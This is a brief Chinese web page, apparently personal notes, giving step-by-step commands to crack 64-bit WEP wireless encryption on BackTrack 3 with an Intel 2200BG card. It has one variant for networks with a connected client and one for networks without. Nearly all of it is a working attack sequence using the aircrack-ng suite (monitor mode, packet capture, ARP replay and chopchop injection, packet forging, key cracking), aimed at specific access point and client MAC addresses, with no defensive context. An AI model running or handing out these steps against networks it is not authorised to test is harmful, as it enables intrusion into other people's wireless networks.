2200BG Linux下BT3 破解64bit WEP


2200BG Linux下BT3 破解64bit WEP

2200BG Linux下BT3 破解64bit WEP

有客户端 :
airmon-ng start eth1
airodump-ng --ivs -w 1 -c 11 eth1
modprobe ipw2200 rtap-iface=1
iwconfig eth1 ap 00:02:a8:a2:2d:69
iwconfig eth1 key s:fakekey
{
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
}
aireplay-ng -3 -b 00:02:a8:a2:2d:69 -h 00:15:00:2A:AC:40 eth1                *****
aircrack-ng -n 64 1-01.ivs
aircrack-ng -n 128 1-01.ivs

2200BG Linux下BT3 破解64bit WEP

无客户端:
airmon-ng start eth1
modprobe ipw2200 rtap-iface=1
iwconfig eth1 key s:fakekey
iwconfig eth1 mode managed
airodump-ng --ivs -w 1 -c 11 eth1
aireplay-ng -4 -e myLGNet -a 00:02:a8:a2:2d:69 -h 0015002AAC40 -i rtap0 eth1
packetforge-ng -0 -a 00:02:a8:a2:2d:69 -h 0015002AAC40 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0228-003015.xor -w rap
aireplay-ng -2 -r rap eth1
aircrack-ng -n 64 *.ivs

相关内容